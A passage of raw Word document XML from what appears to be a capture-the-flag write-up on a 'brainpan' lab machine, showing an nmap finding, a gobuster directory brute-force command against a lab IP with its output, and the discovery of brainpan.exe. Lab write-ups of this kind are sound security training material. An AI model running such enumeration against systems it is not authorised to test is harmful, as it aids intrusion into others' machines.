        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D4A6CDF" w14:textId="1BA6C417" w:rsidR="005F16B8" w:rsidRDefault="005F16B8" w:rsidP="00995644">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D97DFB">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D97DFB">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D97DFB">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> scan shows that the webserver at port 10,000 is a Python </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F4622A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SimpleHTTPServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D97DFB">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>. The webserver landing page shows this infographic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67850288" w14:textId="77777777" w:rsidR="00D97DFB" w:rsidRPr="00D97DFB" w:rsidRDefault="00D97DFB" w:rsidP="00995644">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12A43098" w14:textId="3FE8F99B" w:rsidR="00D97DFB" w:rsidRPr="00D97DFB" w:rsidRDefault="005F16B8" w:rsidP="00995644">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D97DFB">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A2E7BD7" wp14:editId="53A88BA0">
            <wp:extent cx="2782824" cy="3538331"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="1383004328" name="Picture 1" descr="ARE YOU PRACTICING &#10;SAFE CODING? &#10;WHAT'S THE BIG DEAL? &#10;As 2011 proved to be the year of the hack, &#10;the need for secure application coding is &#10;greater than ever. Application &#10;requirements are heightening in the wake &#10;of critical application breaches. meaning &#10;knowledge and training must rise to ensure &#10;safe coding. &#10;Previously. attackers used application vulnerabilities ta cause embarrassment and disruption. aut now these &#10;attackers are exploiting vulnerabilities to steal data and much more: &#10;IP THEFT &#10;TAKING OVER HIGH-VALUE &#10;ACCOUNTS &#10;ARE APPLICATIONS REALLY THAT UNSAFE? &#10;MODIFYING VICTIMS &#10;WEBSITES TO DEPLOY &#10;MALWARE TO WEBSITE &#10;VISITORS &#10;BREACHING ORGANIZATION &#10;PERIMETERS &#10;Mare than 8 out of 10 applications failed to pass OWASP Top ID When first tested. More than &#10;half of all developers received a grade af C or lower on a basic application security assessment. &#10;TOP 5 APPLICATION VULNERABILITIES &#10;• Percentage of Web Applications Affected Percentage of Hacks* &#10;SOL Injection &#10;xss &#10;Information &#10;Leakage &#10;32% &#10;20% &#10;10% &#10;3% &#10;Cryptographic &#10;Issues &#10;OS Command &#10;Injection &#10;53% &#10;2% &#10;9% &#10;1% &#10;•Source: WHID &#10;While other flaws such as XSS account for a higher volume of &#10;findings, SQL injection accounts for 20 percent of ha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YOU PRACTICING &#10;SAFE CODING? &#10;WHAT'S THE BIG DEAL? &#10;As 2011 proved to be the year of the hack, &#10;the need for secure application coding is &#10;greater than ever. Application &#10;requirements are heightening in the wake &#10;of critical application breaches. meaning &#10;knowledge and training must rise to ensure &#10;safe coding. &#10;Previously. attackers used application vulnerabilities ta cause embarrassment and disruption. aut now these &#10;attackers are exploiting vulnerabilities to steal data and much more: &#10;IP THEFT &#10;TAKING OVER HIGH-VALUE &#10;ACCOUNTS &#10;ARE APPLICATIONS REALLY THAT UNSAFE? &#10;MODIFYING VICTIMS &#10;WEBSITES TO DEPLOY &#10;MALWARE TO WEBSITE &#10;VISITORS &#10;BREACHING ORGANIZATION &#10;PERIMETERS &#10;Mare than 8 out of 10 applications failed to pass OWASP Top ID When first tested. More than &#10;half of all developers received a grade af C or lower on a basic application security assessment. &#10;TOP 5 APPLICATION VULNERABILITIES &#10;• Percentage of Web Applications Affected Percentage of Hacks* &#10;SOL Injection &#10;xss &#10;Information &#10;Leakage &#10;32% &#10;20% &#10;10% &#10;3% &#10;Cryptographic &#10;Issues &#10;OS Command &#10;Injection &#10;53% &#10;2% &#10;9% &#10;1% &#10;•Source: WHID &#10;While other flaws such as XSS account for a higher volume of &#10;findings, SQL injection accounts for 20 percent of hack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4691" cy="3705999"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D647DCB" w14:textId="77777777" w:rsidR="009874AB" w:rsidRDefault="009874AB" w:rsidP="00995644">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69B94B28" w14:textId="77777777" w:rsidR="009874AB" w:rsidRDefault="009874AB" w:rsidP="00995644">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06DA8442" w14:textId="77777777" w:rsidR="009874AB" w:rsidRDefault="009874AB" w:rsidP="00995644">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46848CE0" w14:textId="3B9D5CC7" w:rsidR="00D97DFB" w:rsidRDefault="00D97DFB" w:rsidP="00995644">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D97DFB">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Running a directory brute force</w:t>
      </w:r>
      <w:r w:rsidR="00035DA1">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00035DA1">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D97DFB">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the webserver reveals the </w:t>
      </w:r>
      <w:r w:rsidRPr="00035DA1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/bin</w:t>
      </w:r>
      <w:r w:rsidRPr="00D97DFB">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43719271" w14:textId="77777777" w:rsidR="00924E20" w:rsidRDefault="00924E20" w:rsidP="00995644">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B827C8C" w14:textId="2AE88145" w:rsidR="00924E20" w:rsidRPr="00A427D6" w:rsidRDefault="00924E20" w:rsidP="00924E20">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A427D6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A427D6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A427D6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A427D6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A427D6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A427D6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://10.10.76.131:10000/ -w /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A427D6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A427D6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/share/wordlists/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A427D6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>dirbuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A427D6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/directory-list-2.3-medium.txt -t 25 -o dirbrute.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F0F3E2" w14:textId="77777777" w:rsidR="00924E20" w:rsidRPr="00924E20" w:rsidRDefault="00924E20" w:rsidP="00924E20">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00924E20">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C8E3AB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D2E44C" w14:textId="77777777" w:rsidR="00924E20" w:rsidRPr="00924E20" w:rsidRDefault="00924E20" w:rsidP="00924E20">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00924E20">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00924E20">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> v3.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8D14E4"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xml:space="preserve">by OJ Reeves (@TheColonial) &amp; Christian </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00924E20">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Mehlmauer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00924E20">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> (@firefart)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62677480"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35ED2E23" w14:textId="518C3B1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xml:space="preserve">[+] Url:                     </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD04A2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>http://10.10.76.131:10000/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670FD42C"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Method:                  GET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654B858E"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Threads:                 25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4F962B"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Wordlist:                /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00924E20">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00924E20">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/share/wordlists/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00924E20">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>dirbuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00924E20">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/directory-list-2.3-medium.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1140B396"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Negative Status codes:   404</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A362B4D"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xml:space="preserve">[+] User Agent:              </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00924E20">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00924E20">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/3.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B281074"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Timeout:                 10s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0BDFC6"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31947A29"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xml:space="preserve">2023/06/19 20:11:25 Starting </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00924E20">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00924E20">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> in directory enumeration mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281F3875" w14:textId="77777777" w:rsidR="00924E20" w:rsidRP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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C5B7DF" w14:textId="77777777" w:rsidR="00924E20" w:rsidRDefault="00924E20" w:rsidP="00924E20">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00924E20">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin               </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00924E20">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">   (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00924E20">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Status: 301) [Size: 0] [--&gt; /bin/]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFEBB69" w14:textId="77777777" w:rsidR="005F16B8" w:rsidRDefault="005F16B8" w:rsidP="00995644">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4321BF18" w14:textId="5AB6FD0A" w:rsidR="007572BE" w:rsidRDefault="007572BE" w:rsidP="00995644">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The directory contains one Windows executable called brainpan.exe</w:t>
      </w:r>
      <w:r w:rsidR="009E323B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270C419A" w14:textId="77777777" w:rsidR="009E323B" w:rsidRDefault="009E323B" w:rsidP="00995644">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FFF32D1" w14:textId="13C2EFA4" w:rsidR="009E323B" w:rsidRDefault="009E323B" w:rsidP="00995644">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25257D94" wp14:editId="507AD825">
            <wp:extent cx="4023360" cy="1049655"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1872219099" name="Picture 2" descr="Directory listing for [bin/ &#10;• _mmpan.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y listing for [bin/ &#10;• _mmpan.ex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3360" cy="1049655"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="414DC99E" w14:textId="77777777" w:rsidR="009E323B" w:rsidRDefault="009E323B" w:rsidP="00995644">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="076A6E64" w14:textId="02285590" w:rsidR="00F64A90" w:rsidRDefault="009E323B" w:rsidP="005D7933">
      <w:pPr>
